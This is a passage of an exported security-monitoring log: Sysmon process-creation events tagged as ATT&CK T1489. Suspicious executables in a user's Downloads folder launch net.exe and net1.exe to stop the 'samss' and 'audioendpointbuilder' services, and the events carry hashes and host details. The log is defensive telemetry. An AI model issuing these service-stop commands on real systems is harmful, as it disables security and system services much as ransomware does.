LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.414892100Z"",""eventRecordID"":""1355"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:47.408\r\nProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500}\r\nProcessId: 268680\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:47.408"",""processGuid"":""{df9fc3d3-d263-5ec7-0000-001048b64500}"",""processId"":""268680"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:50.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.962 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010a1194500} +ProcessId: 236792 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500} +ParentProcessId: 293852 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.972677100Z"",""eventRecordID"":""1353"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.962\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010a1194500}\r\nProcessId: 236792\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500}\r\nParentProcessId: 293852\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.962"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-0010a1194500}"",""processId"":""236792"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d25d-5ec7-0000-0010870d4500}"",""parentProcessId"":""293852"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:50.224",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.742 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010840f4500} +ProcessId: 293864 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500} +ParentProcessId: 293800 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.744676900Z"",""eventRecordID"":""1352"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.742\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010840f4500}\r\nProcessId: 293864\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500}\r\nParentProcessId: 293800\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.742"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-0010840f4500}"",""processId"":""293864"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d25d-5ec7-0000-001029034500}"",""parentProcessId"":""293800"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:50.216",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.704 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500} +ProcessId: 293852 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.723032600Z"",""eventRecordID"":""1351"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.704\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-0010870d4500}\r\nProcessId: 293852\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.704"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-0010870d4500}"",""processId"":""293852"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:50.209",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:41.460 +ProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500} +ProcessId: 293800 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.485424600Z"",""eventRecordID"":""1350"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:41.460\r\nProcessGuid: {df9fc3d3-d25d-5ec7-0000-001029034500}\r\nProcessId: 293800\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:41.460"",""processGuid"":""{df9fc3d3-d25d-5ec7-0000-001029034500}"",""processId"":""293800"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:19.979",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.736 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-001001a84000} +ProcessId: 290648 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000} +ParentProcessId: 290572 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.744248600Z"",""eventRecordID"":""1346"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.736\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-001001a84000}\r\nProcessId: 290648\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001023a04000}\r\nParentProcessId: 290572\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.736"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-001001a84000}"",""processId"":""290648"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d23c-5ec7-0000-001023a04000}"",""parentProcessId"":""290572"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:19.955",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:08.498 +ProcessGuid: {df9fc3d3-d23c-5ec7-0000-00107ba14000} +ProcessId: 290588 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000} +ParentProcessId: 290508 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.501771600Z"",""eventRecordID"":""1345"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:08.498\r\nProcessGuid: {df9fc3d3-d23c-5ec7-0000-00107ba14000}\r\nProcessId: 290588\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d23c-5ec7-0000-001089994000}\r\nParentProcessId: 290508\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:08.498"",""processGuid"":""{df9fc3d3-d23c-5ec7-0000-00107ba14000}"",""processId"":""290588"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 